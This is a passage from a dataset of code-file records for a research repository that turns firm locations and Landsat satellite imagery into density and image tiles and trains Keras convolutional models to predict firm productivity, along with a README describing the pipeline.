1\n print(zone, len(df), len(df1))\n\n hist1 = df1.groupby(['pix_east', 'pix_north']).size().rename('count').reset_index()\n hist1['density'] = hist1['count']/(pixel/1e3)**2 # firms per square kilometer\n hist1.to_csv(f'{args.dense}/total_utm{zone}_{pixel}px.csv', index=False)\n\n hist2 = df1.groupby(['sic2', 'pix_east', 'pix_north']).size().rename('count').reset_index()\n hist2['density'] = hist2['count']/(pixel/1e3)**2 # firms per square kilometer\n hist2.to_csv(f'{args.dense}/industry_utm{zone}_{pixel}px.csv', index=False)\n"
},
{
"alpha_fraction": 0.6202117204666138,
"alphanum_fraction": 0.6325312852859497,
"avg_line_length": 38.35606002807617,
"blob_id": "dfc887dcabf6165e09e8b959b4032519d61ee6e2",
"content_id": "83fbb881c20e2a76e58b6d3a2de885c81f586c28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5195,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 132,
"path": "/code/tiles_density.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse as sp\nfrom PIL import Image\nfrom pyproj import Proj\nfrom scipy.ndimage.filters import gaussian_filter\nfrom coord_transform import wgs2utm\nfrom multiprocessing import Pool\n\n# lest pillow complain\nImage.MAX_IMAGE_PIXELS = 1000000000\n\n# to limit directory sizes\ndef store_chunk(loc, tag, ext='jpg', overwrite=False):\n tag = f'{tag:07d}'\n sub = tag[:4]\n psub = f'{loc}/{sub}'\n os.makedirs(psub, exist_ok=True)\n ptag = f'{psub}/{tag}.{ext}'\n if overwrite or not os.path.exists(ptag):\n return ptag\n else:\n return None\n\n# sigma: blur in meters\n# norm: density units\ndef extract_density_mat(mat, px, py, rad=256, size=256, sigma=2, norm=300, image=True):\n # extract area\n den = mat[py-rad:py+rad, px-rad:px+rad].toarray()\n\n # gaussian blur\n if sigma is not None:\n den = gaussian_filter(den, sigma=sigma)\n\n # normalize and rectify\n if norm is not None:\n # norm = np.quantile(den[den>0], rect)\n den = den/(den+norm)\n\n if image:\n # quantize, pitch correct, and overly inspect\n im = Image.fromarray((255*den).astype(np.uint8), 'L')\n im = im.transpose(Image.FLIP_TOP_BOTTOM)\n im = im.resize((size, size), resample=Image.LANCZOS)\n return im\n else:\n return den\n\n# this expects WGS84 coordinates\ndef extract_density_coords(lon, lat, density, **kwargs):\n utm = wgs2utm(lon, lat)\n cells = pd.read_csv(f'{density}/utm_cells.csv', index_col='utm')\n pixel, N = cells.loc[utm, 'pixel'], cells.loc[utm, 'N']\n west, south, span = cells.loc[utm, ['utm_west', 'utm_south', 'size']]\n proj = Proj(f'+proj=utm +zone={utm}, +ellps=WGS84 +datum=WGS84 +units=m +no_defs')\n\n hist = pd.read_csv(f'{density}/density_utm{utm}_{pixel}px.csv')\n mat = sp.csr_matrix((hist['density'], (hist['pix_north'], hist['pix_east'])), shape=(N, N))\n\n x, y = proj(lon, lat)\n fx, fy = (x-west)/span, (y-south)/span\n px, py = int(fx*N), int(fy*N)\n\n return extract_density_mat(mat, px, py, **kwargs)\n\ndef make_sparse_map(data, N):\n return sp.csr_matrix((data['density'], (data['pix_north'], data['pix_east'])), shape=(N, N))\n\ndef extract_density_utm(utm, firms, density, output, overwrite=False, ext='jpg', **kwargs):\n cells = pd.read_csv(f'{density}/utm_cells.csv', index_col='utm')\n pixel, N = cells.loc[utm, 'pixel'], cells.loc[utm, 'N']\n west, south, span = cells.loc[utm, ['utm_west', 'utm_south', 'size']]\n proj = Proj(f'+proj=utm +zone={utm}, +ellps=WGS84 +datum=WGS84 +units=m +no_defs')\n\n hist_tot = pd.read_csv(f'{density}/total_utm{utm}_{pixel}px.csv')\n mat_tot = make_sparse_map(hist_tot, N)\n path_tot = f'{output}/total'\n\n hist_ind = pd.read_csv(f'{density}/industry_utm{utm}_{pixel}px.csv')\n group_ind = hist_ind.groupby('sic2').groups\n mat_ind = {ind: make_sparse_map(hist_ind.loc[rows], N) for ind, rows in group_ind.items()}\n path_ind = f'{output}/industry'\n\n for _, tag, ind, lon, lat in firms[['id', 'sic2', 'lon_wgs84', 'lat_wgs84']].itertuples():\n x, y = proj(lon, lat)\n fx, fy = (x-west)/span, (y-south)/span\n px, py = int(fx*N), int(fy*N)\n\n if (fname_tot := store_chunk(path_tot, tag, ext=ext, overwrite=overwrite)) is not None:\n im_tot = extract_density_mat(mat_tot, px, py, **kwargs)\n im_tot.save(fname_tot)\n\n if (fname_ind := store_chunk(path_ind, tag, ext=ext, overwrite=overwrite)) is not None:\n im_ind = extract_density_mat(mat_ind[ind], px, py, **kwargs)\n im_ind.save(fname_ind)\n\nif __name__ == '__main__':\n import argparse\n from multiprocessing import Pool\n\n # parse input arguments\n parser = argparse.ArgumentParser(description='patent application parser')\n parser.add_argument('firms', type=str, help='firm data file')\n parser.add_argument('density', type=str, help='path to density directory')\n parser.add_argument('output', type=str, help='directory to output to')\n parser.add_argument('--sample', type=int, default=None, help='sample only N firms')\n parser.add_argument('--overwrite', action='store_true', help='clobber existing files')\n parser.add_argument('--threads', type=int, default=10, help='number of threads to use')\n parser.add_argument('--chunksize', type=int, default=1_000, help='chunksize to overlay')\n args = parser.parse_args()\n\n firms = pd.read_csv(args.firms, usecols=['id', 'sic4', 'utm_zone', 'lon_wgs84', 'lat_wgs84'])\n firms['sic2'] = firms['sic4'] // 100\n\n if args.sample is not None:\n firms = firms.sample(n=args.sample)\n\n firms = firms.sort_values(by=['utm_zone']).reset_index(drop=True)\n firms = firms.rename_axis('row', axis=0).reset_index()\n firms['row_group'] = firms['row'] // args.chunksize\n\n utm_grp = firms.groupby(['utm_zone', 'row_group'])\n utm_map = [(z, firms.loc[i]) for (z, g), i in utm_grp.groups.items()]\n print(len(utm_map))\n\n opts = {'overwrite': args.overwrite}\n def extract_func(z, f):\n extract_density_utm(z, f, args.density, args.output, **opts)\n\n with Pool(args.threads) as pool:\n pool.starmap(extract_func, utm_map, chunksize=1)\n"
},
{
"alpha_fraction": 0.6053770184516907,
"alphanum_fraction": 0.6347342133522034,
"avg_line_length": 37.52381134033203,
"blob_id": "b2e70dc51effa1b3fd6c1138182d3343128e9bb8",
"content_id": "69fb61fc79c043a88881caa31bda49cfe42ee247",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3236,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 84,
"path": "/code/train_tools.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport sklearn.model_selection as sk\nfrom scipy.interpolate import InterpolatedUnivariateSpline\n\n##\n## model fit evaluation\n##\n\ndef interp_pandas(data, index=None, xmin=None, xmax=None, N=None):\n index0 = data.index\n if index is None:\n if xmin is None: xmin = index0.min()\n if xmax is None: xmax = index0.max()\n if N is None: N = 100\n index = np.linspace(index0.min(), index0.max(), N)\n def terp(x):\n spline = InterpolatedUnivariateSpline(index0, x)\n return pd.Series(spline(index), index=index)\n if type(data) is pd.Series:\n return terp(data)\n elif type(data) is pd.DataFrame:\n return pd.DataFrame({x: terp(data[x]) for x in data})\n\ncolor = (0.32628988850442137, 0.6186236063052672, 0.802798923490965)\ndef plot_errors(y, s, data, ax, alpha=0.4, interp=True):\n if interp:\n data1 = interp_pandas(data[[y, s]])\n else:\n data1 = data.copy()\n indx, vals, stds = data1.index, data1[y], data1[s]\n lo1, hi1 = vals - stds, vals + stds\n lo2, hi2 = lo1 - stds, hi1 + stds\n ax.plot(indx, vals, color=color)\n ax.fill_between(indx, lo1, hi1, color=color, alpha=alpha)\n ax.fill_between(indx, lo2, hi2, color=color, alpha=0.5*alpha)\n\nlnorm = mpl.colors.LogNorm()\ndef eval_model(y, yhat, N=10, axs=None, qmin=None, qmax=None, ymin=None, ymax=None):\n ax0, ax1 = axs\n if qmin is not None: ymin = np.quantile(y, qmin)\n if qmax is not None: ymax = np.quantile(y, qmax)\n\n res = pd.DataFrame({'y': y, 'yhat': yhat}).astype(np.float)\n ax0.hexbin(res['y'], res['yhat'], cmap=mpl.cm.Blues, norm=lnorm,\n gridsize=20, extent=(ymin, ymax, ymin, ymax))\n\n bins = np.linspace(ymin, ymax, N)\n res['ybin'] = np.digitize(res['y'], bins)\n res['ybin'] = np.minimum(N-1, res['ybin'])\n bmean = res.groupby('ybin')['yhat'].agg(mean=np.mean, var=np.std, size=len)\n bmean['std'] = bmean['var']/np.sqrt(bmean['size'])\n bmean = bmean.reindex(np.arange(N))\n bmean.index = bins\n plot_errors('mean', 'std', bmean, ax1)\n\n ax0.set_xlabel('True Productivity')\n ax0.set_ylabel('Predicted Productivity')\n ax0.set_title('Joint Distribution')\n ax1.set_xlabel('True Productivity')\n # ax1.set_ylabel('Predicted Productivity')\n ax1.set_title(f'Binned Results ({N})')\n\ndef predict_data(model, data, steps):\n it = iter(data)\n x_test, y_test = zip(*[next(it) for _ in range(steps)])\n yh_test = [model.predict(x) for x in x_test]\n x_test = [np.concat(x) for x in zip(*x_test)]\n y_test = np.concat(y_test).squeeze()\n yh_test = np.concat(yh_test).squeeze()\n return x_test, y_test, yh_test\n\n# semi-balanced category split\ndef categ_split(data, cat, val_frac, state=None):\n cat_train, cat_valid = sk.train_test_split(data[cat].unique(), test_size=val_frac, random_state=state)\n cat_group = pd.concat([\n pd.DataFrame({cat: cat_train, 'group': 'train'}),\n pd.DataFrame({cat: cat_valid, 'group': 'valid'})\n ], axis=0).set_index(cat)\n data_group = data[[cat]].join(cat_group, on=cat)\n df_train = data[data_group['group']=='train']\n df_valid = data[data_group['group']=='valid']\n return df_train, df_valid\n"
},
{
"alpha_fraction": 0.6527742743492126,
"alphanum_fraction": 0.6834304332733154,
"avg_line_length": 44.36781692504883,
"blob_id": "0fef0194d5ccc13e0827c9a15498dbcbb5884060",
"content_id": "cc0591f571dab5fd1c978be1e71b07874192ee67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7894,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 174,
"path": "/code/train_models.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nfrom tensorflow import keras\n\n##\n## high complexity, dual channel\n##\n\ndef gen_dual_high(K, C, loss='mean_squared_error', optimizer='adam', pooling='AveragePooling2D'):\n Pooling2D = getattr(keras.layers, pooling)\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n layer1 = keras.layers.Conv2D(filters=16, kernel_size=8, activation='relu')(input_map)\n layer2 = keras.layers.MaxPooling2D(pool_size=8)(layer1)\n layer3 = keras.layers.Conv2D(filters=32, kernel_size=8, activation='relu')(layer2)\n layer4 = keras.layers.MaxPooling2D(pool_size=4)(layer3)\n layer5 = keras.layers.Flatten()(layer4)\n layer6 = keras.layers.Dropout(0.5)(layer5)\n layer7 = keras.layers.Dense(units=64, activation='relu')(layer6)\n layer8 = keras.layers.Dropout(0.5)(layer7)\n output = keras.layers.Dense(units=1)(layer8)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optimizer)\n return model\n\n##\n## medium complexity, dual channel\n##\n\ndef gen_dual_medium(K, C, loss='mean_squared_error', optimizer='adam', pooling='AveragePooling2D'):\n Pooling2D = getattr(keras.layers, pooling)\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n layer1 = keras.layers.Conv2D(filters=8, kernel_size=8, activation='relu')(input_map)\n layer2 = Pooling2D(pool_size=8)(layer1)\n layer3 = keras.layers.Conv2D(filters=16, kernel_size=8, activation='relu')(layer2)\n layer4 = Pooling2D(pool_size=4)(layer3)\n layer5 = keras.layers.Flatten()(layer4)\n layer6 = keras.layers.Dropout(0.5)(layer5)\n layer7 = keras.layers.Dense(units=32, activation='relu')(layer6)\n layer8 = keras.layers.Dropout(0.5)(layer7)\n output = keras.layers.Dense(units=1)(layer8)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optimizer)\n return model\n\n##\n## low complexity, dual channel\n##\n\ndef gen_dual_low(K, C, loss='mean_squared_error', optimizer='adam', pooling='AveragePooling2D'):\n Pooling2D = getattr(keras.layers, pooling)\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n layer1 = keras.layers.Conv2D(filters=4, kernel_size=8, activation='relu')(input_map)\n layer2 = Pooling2D(pool_size=8)(layer1)\n layer3 = keras.layers.Conv2D(filters=8, kernel_size=8, activation='relu')(layer2)\n layer4 = Pooling2D(pool_size=4)(layer3)\n layer5 = keras.layers.Flatten()(layer4)\n layer6 = keras.layers.Dropout(0.5)(layer5)\n layer7 = keras.layers.Dense(units=16, activation='relu')(layer6)\n layer8 = keras.layers.Dropout(0.5)(layer7)\n output = keras.layers.Dense(units=1)(layer8)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optimizer)\n return model\n\n##\n## depthwise convolve, high complexity\n##\n\ndef gen_depth_high(K, C, loss='mean_squared_error', optimizer='adam'):\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n layer1 = keras.layers.DepthwiseConv2D(depth_multiplier=8, kernel_size=8, activation='relu')(input_map)\n layer2 = keras.layers.MaxPooling2D(pool_size=8)(layer1)\n layer3 = keras.layers.DepthwiseConv2D(depth_multiplier=4, kernel_size=4, activation='relu')(layer2)\n layer4 = keras.layers.MaxPooling2D(pool_size=4)(layer3)\n layer5 = keras.layers.Flatten()(layer4)\n layer6 = keras.layers.Dropout(0.5)(layer5)\n layer7 = keras.layers.Dense(units=64, activation='relu')(layer6)\n layer8 = keras.layers.Dropout(0.5)(layer7)\n output = keras.layers.Dense(units=1)(layer8)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optimizer)\n return model\n\n##\n## depthwise convolve, medium complexity\n##\n\ndef gen_depth_medium(K, C, loss='mean_squared_error', optimizer='adam'):\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n layer1 = keras.layers.DepthwiseConv2D(depth_multiplier=4, kernel_size=8, activation='relu')(input_map)\n layer2 = keras.layers.MaxPooling2D(pool_size=8)(layer1)\n layer3 = keras.layers.DepthwiseConv2D(depth_multiplier=2, kernel_size=4, activation='relu')(layer2)\n layer4 = keras.layers.MaxPooling2D(pool_size=4)(layer3)\n layer5 = keras.layers.Flatten()(layer4)\n layer6 = keras.layers.Dropout(0.5)(layer5)\n layer7 = keras.layers.Dense(units=32, activation='relu')(layer6)\n layer8 = keras.layers.Dropout(0.5)(layer7)\n output = keras.layers.Dense(units=1)(layer8)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optimizer)\n return model\n\n##\n## depthwise convolve, low complexity\n##\n\ndef gen_depth_low(K, C, loss='mean_squared_error', optimizer='adam'):\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n layer1 = keras.layers.DepthwiseConv2D(depth_multiplier=4, kernel_size=4, activation='relu')(input_map)\n layer2 = keras.layers.MaxPooling2D(pool_size=8)(layer1)\n layer3 = keras.layers.DepthwiseConv2D(depth_multiplier=1, kernel_size=4, activation='relu')(layer2)\n layer4 = keras.layers.MaxPooling2D(pool_size=7)(layer3)\n layer5 = keras.layers.Flatten()(layer4)\n layer6 = keras.layers.Dropout(0.5)(layer5)\n layer7 = keras.layers.Dense(units=16, activation='relu')(layer6)\n layer8 = keras.layers.Dropout(0.5)(layer7)\n output = keras.layers.Dense(units=1)(layer8)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optimizer)\n return model\n\n##\n## average density model\n##\n\ndef gen_avg_density(K, C, loss='mean_squared_error', optimizer='adam'):\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n layer1 = keras.layers.GlobalAveragePooling2D()(input_map)\n output = keras.layers.Dense(units=1)(layer1)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optmizer)\n return model\n\n##\n## variable radius pooling model\n##\n\nclass RadialPooling2D(keras.layers.Layer):\n def __init__(self, R, S, **kwargs):\n super().__init__(**kwargs)\n self.R = R\n self.S = S\n\n def build(self, input_shape):\n _, self.span_x, self.span_y, self.chan = input_shape\n self.size0 = self.add_weight(name='size', shape=(1,), dtype=tf.float32, initializer='uniform', trainable=True)\n super().build(input_shape)\n\n def call(self, x):\n size = self.R*keras.activations.sigmoid(self.size0)\n zero_x, zero_y = int(self.span_x//2), int(self.span_y//2)\n vals_x, vals_y = tf.cast(tf.range(self.span_x), tf.float32), tf.cast(tf.range(self.span_y), dtype=tf.float32)\n grid_x, grid_y = tf.meshgrid(vals_x, vals_y)\n radius = tf.sqrt((grid_x-zero_x)**2+(grid_y-zero_y)**2)\n mask = keras.activations.sigmoid(-(radius-size)/self.S)[None,:,:,None]\n return tf.reduce_mean(x*mask, axis=[1, 2])\n\n def compute_output_shape(self, input_shape):\n return (1,)\n\ndef gen_radial_pool(K, C, P, R=128, S=5, loss='mean_squared_error', optimizer='adam'):\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n pool = keras.layers.Concatenate()([RadialPooling2D(R, S)(input_map) for _ in range(P)])\n output = keras.layers.Dense(1)(pool)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optimizer)\n return model\n"
},
{
"alpha_fraction": 0.7525951266288757,
"alphanum_fraction": 0.7652825713157654,
"avg_line_length": 43.46154022216797,
"blob_id": "866c0561ee530e45464d9edb46d36fc70a7f13db",
"content_id": "20a1f5bd332e3cca7f16e5bb811def00ff8dfd40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1734,
"license_type": "no_license",
"max_line_length": 257,
"num_lines": 39,
"path": "/README.md",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "## Geographic Clustering\n\nNeed to set up Google Cloud SDK and gsutil. More info on Google hosted Landsat data at: [https://cloud.google.com/storage/docs/public-datasets/landsat](https://cloud.google.com/storage/docs/public-datasets/landsat).\n\n#### Scene selection\n\nDownload full index from Google: [gs://gcp-public-data-landsat/index.csv.gz](gs://gcp-public-data-landsat/index.csv.gz), save to `index/landsat/google_landsat_index.csv`.\n\nGiven the master index of scenes, need to filter by spatiotemporal range and select for optimal viewing conditions (due to cloud coverage). This is done using `filter_scenes.py`, which outputs to something like `data/scenes/google_scenes_2002_mincloud.csv`.\n\nFetch selected scenes with `fetch_scenes.py`. Save to `data/scenes` directory.\n\n#### Firm resolution\n\nIndex which scene each firm is located in. Use `firm_scenes.py` and output to something like `index/firms/census2004_mincloud2002.csv`. This also performs the `BD-09` to `WGS-84` conversion and generates `UTM` values.\n\n#### Density generation\n\nGenerate sparse firm density information partitioned by expanded, partially overlapping `UTM` squares. Run `firm_density.py` to store in `data/density`.\n\nTODO: construct upstream, downstream, and within measures.\n\n#### Extract firm tiles\n\nUse `generate_tiles.py` to generate satellite and density tiles from firm data and store in `data/tiles/*`.\n\n#### Train algorithm\n\nPrimary training code is in `notebooks/dataset.ipynb`.\n\n### Notes\n\nSome notes on technical matters.\n\n#### Coordinates\n\n- `WGS-84`: standard coordinate system used by GPS, developed by US DOD\n- `GCJ-02`: coordinate system used by Chinese, location is fuzzed\n- `BD-09`: updated coordinate system used by Baidu, more fuzzing\n"
},
{
"alpha_fraction": 0.6685330271720886,
"alphanum_fraction": 0.6969018578529358,
"avg_line_length": 30.89285659790039,
"blob_id": "22d46b99ed956db1adc60200ae1b9c4f44e10e60",
"content_id": "537e11045e9c241b7ee0c24e4277b0f42e0564b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2679,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 84,
"path": "/code/train_predictor.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "# train predictor\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport PIL\nimport statsmodels.formula.api as smf\nimport sklearn.model_selection as sk\nimport mectools.data as dt\nimport tensorflow as tf\nfrom tensorflow import keras\n\n# args\nseed = 2384923\nsamp = 0.01\nBATCH_SIZE = 32\nsize = 1024\n\n# random init\nstate = np.random.RandomState(seed)\n\n# functions\ndef load_path(tag, base='tiles/density', ext='jpg'):\n tag = f'{tag:07d}'\n sub = tag[:4]\n return f'{base}/{size}px/{sub}/{tag}.{ext}'\n\n# load in firm and location data\nfirms = pd.read_csv('firms/census_2004_geocode.csv', usecols=['id', 'industry', 'income', 'total_assets', 'employees'])\ntarg = pd.read_csv('targets/census_firms_2004.csv', usecols=['id', 'lat_wgs84', 'lon_wgs84'])\nfirms = pd.merge(firms, targ, on='id', how='left').dropna()\n\n# downsample for now\nfirms = firms.sample(frac=samp)\n\n# resolve image paths\nfirms['file'] = firms['id'].apply(load_path)\nfirms['fexist'] = firms['file'].apply(os.path.exists)\nfirms = firms[firms['fexist']]\n\n# calculate outcome stats\nfirms['prod'] = firms['income']/firms['employees']\nfirms['lprod'] = dt.log(firms['prod'])\nfirms = firms.dropna(subset=['lprod'])\n\n# calculate residual performance\nreg_ind = smf.ols('lprod ~ 0 + C(industry)', data=firms).fit()\nfirms['lprod_resid'] = reg_ind.resid\n\n# map into feature/label vocab\nfeatures = np.stack([np.array(PIL.Image.open(fn)) for fn in firms['file']])\nlabels = firms['lprod_resid'].values\n\n# conform to shapes\nfeatures = features[:,:,:,None].astype(np.float32)/255 # single channel image\nlabels = labels.astype(np.float32)[:,None]\n\n# do train/test split\nX_train, X_valid, y_train, y_valid = sk.train_test_split(features, labels, test_size=0.2, random_state=seed)\n\n# define keras model\nmodel = keras.Sequential([\n keras.layers.Conv2D(filters=32, kernel_size=4, activation='relu'),\n keras.layers.Conv2D(filters=32, kernel_size=4, activation='relu'),\n keras.layers.MaxPooling2D(pool_size=4),\n keras.layers.Dropout(0.5),\n keras.layers.Conv2D(filters=64, kernel_size=4, activation='relu'),\n keras.layers.Conv2D(filters=64, kernel_size=4, activation='relu'),\n keras.layers.MaxPooling2D(pool_size=4),\n keras.layers.Dropout(0.5),\n keras.layers.Flatten(),\n keras.layers.Dense(units=512, activation='relu'),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(units=1)\n])\n\n# train keras model\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nhistory = model.fit(X_train, y_train, epochs=100, validation_data=[X_valid, y_valid])\n\n# evaluate model\nyhat_valid = model.predict(X_valid)\nres = pd.DataFrame({'y': y_valid[:,0], 'yhat': yhat_valid[:,0]})\nres['err'] = res['yhat'] - res['y']\n"
},
{
"alpha_fraction": 0.5834745764732361,
"alphanum_fraction": 0.5989406704902649,
"avg_line_length": 32.47517776489258,
"blob_id": "11f02890cb2cd7b43efe08553beb33aad084b977",
"content_id": "8d04693d63334d6e3fe762482cfbabb57a299773",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4720,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 141,
"path": "/code/tiles_satellite.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse as sp\nfrom PIL import Image\nfrom pyproj import Proj\nfrom scipy.ndimage.filters import gaussian_filter\nfrom coord_transform import bd2wgs, gcj2wgs, wgs2utm\n\n# lest pillow complain\nImage.MAX_IMAGE_PIXELS = 1000000000\n\n# all purpose transform\ndef ensure_wgs(lon, lat, proj):\n if proj == 'bd-09':\n return bd2wgs(lon, lat)\n elif proj == 'gcj-02':\n return gcj2wgs(lon, lat)\n elif proj == 'wgs-84':\n return lon, lat\n else:\n raise('Unknown projection')\n\n# to limit directory sizes\ndef store_chunk(tag, loc, ext='jpg'):\n tag = f'{tag:07d}'\n sub = tag[:4]\n psub = f'{loc}/{sub}'\n os.makedirs(psub, exist_ok=True)\n ptag = f'{psub}/{tag}.{ext}'\n return ptag\n\n##\n## scenes\n##\n\n# parse scene metadata\ndef parse_mtl(fname):\n # hacky parse\n lines = [s.strip() for s in open(fname)]\n corners = [s for s in lines if s.startswith('CORNER')]\n utm = [s for s in lines if s.startswith('UTM')]\n fields = corners + utm\n vals = pd.Series(dict([s.split(' = ') for s in fields]))\n meta = vals.astype(np.float)\n\n # additional utm stats\n meta['UTM_WEST'] = 0.5*(meta['CORNER_LL_PROJECTION_X_PRODUCT']+meta['CORNER_UL_PROJECTION_X_PRODUCT'])\n meta['UTM_EAST'] = 0.5*(meta['CORNER_LR_PROJECTION_X_PRODUCT']+meta['CORNER_UR_PROJECTION_X_PRODUCT'])\n meta['UTM_NORTH'] = 0.5*(meta['CORNER_UL_PROJECTION_Y_PRODUCT']+meta['CORNER_UR_PROJECTION_Y_PRODUCT'])\n meta['UTM_SOUTH'] = 0.5*(meta['CORNER_LL_PROJECTION_Y_PRODUCT']+meta['CORNER_LR_PROJECTION_Y_PRODUCT'])\n meta['UTM_WIDTH'] = meta['UTM_EAST'] - meta['UTM_WEST']\n meta['UTM_HEIGHT'] = meta['UTM_NORTH']- meta['UTM_SOUTH']\n\n return meta\n\n# find scene from wgs84 coordinates\ndef find_scene(lon, lat, index, best=True):\n if type(index) is str:\n index = load_index(index)\n prods = index[\n (index['NORTH_LAT'] >= lat) &\n (index['SOUTH_LAT'] <= lat) &\n (index['EAST_LON' ] >= lon) &\n (index['WEST_LON' ] <= lon)\n ]\n if len(prods) == 0:\n return None\n if best:\n c_lon = 0.5*(prods['WEST_LON']+prods['EAST_LON'])\n c_lat = 0.5*(prods['NORTH_LAT']+prods['SOUTH_LAT'])\n dist = np.sqrt((c_lon-lon)**2+(c_lat-lat)**2)\n best = prods.loc[dist.idxmin()]\n return best['PRODUCT_ID']\n else:\n return prods\n\n# load scene imagery and metadata\ndef load_scene(pid, chan='B8'):\n meta = parse_mtl(f'../data/scenes/{pid}_MTL.txt')\n image = Image.open(f'../data/scenes/{pid}_{chan}.TIF')\n return meta, image\n\n##\n## satellite\n##\n\n# assumes WGS84 datum\ndef extract_satelite_core(lon, lat, meta, image, rad=512):\n utm_zone = meta['UTM_ZONE']\n utm_hemi = 'north' if lat >= 0 else 'south'\n utm_proj = Proj(f'+proj=utm +zone={utm_zone}, +{utm_hemi} +ellps=WGS84 +datum=WGS84 +units=m +no_defs')\n\n x, y = utm_proj(lon, lat)\n fx = (x-meta['UTM_WEST'])/meta['UTM_WIDTH']\n fy = (y-meta['UTM_SOUTH'])/meta['UTM_HEIGHT']\n\n sx, sy = image.size\n px, py = int(fx*sx), int((1-fy)*sy) # image origin is top-left\n box = (px-rad, py-rad, px+rad, py+rad)\n im = image.crop(box)\n\n return im\n\n# extract just one tile, for testing\ndef extract_satelite_tile(lon, lat, rad, pid=None, index=None, size=None, proj='bd-09', chan='B8', image=True, resample=Image.LANCZOS):\n lon, lat = ensure_wgs(lon, lat, proj)\n if pid is None:\n pid = find_scene(lon, lat, index)\n meta, image = load_scene(pid, chan=chan)\n im = extract_satelite_core(lon, lat, meta, image, rad=rad)\n im = im.resize((size, size), resample=resample)\n if image:\n return im\n else:\n return np.asarray(im)\n\n# firms is a (tag, lon, lat, prod) file. assumes WGS84 datum\ndef extract_satelite_firm(firms, output, rad=[256, 1024], size=256, resample=Image.LANCZOS, chan='B8', ext='jpg', overwrite=False):\n if type(firms) is str:\n firms = pd.read_csv(firms)\n firms['id'] = firms['id'].astype(np.int)\n if type(rad) is int:\n rad = [rad]\n\n firms = firms.sort_values(by=['prod_id', 'id'])\n pmap = firms.groupby('prod_id').groups\n print(len(pmap))\n\n for pid in pmap:\n print(pid)\n meta, image = load_scene(pid, chan=chan)\n for idx in pmap[pid]:\n tag, lon, lat = firms.loc[idx][['id', 'lon_wgs84', 'lat_wgs84']]\n for r in rad:\n path = f'{output}/{r}px'\n fname = store_chunk(tag, path, ext=ext)\n if overwrite or not os.path.exists(fname):\n tile = extract_satelite_core(lon, lat, meta, image, rad=r)\n tile = tile.resize((size, size), resample=resample)\n tile.save(fname)\n"
},
{
"alpha_fraction": 0.6537007093429565,
"alphanum_fraction": 0.6607239246368408,
"avg_line_length": 37.5625,
"blob_id": "8567228680e980cee69ad6755027ce6b98a239d1",
"content_id": "1f88229c3d11388327d2392bb77a4d481c009312",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1851,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 48,
"path": "/code/fetch_scenes.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
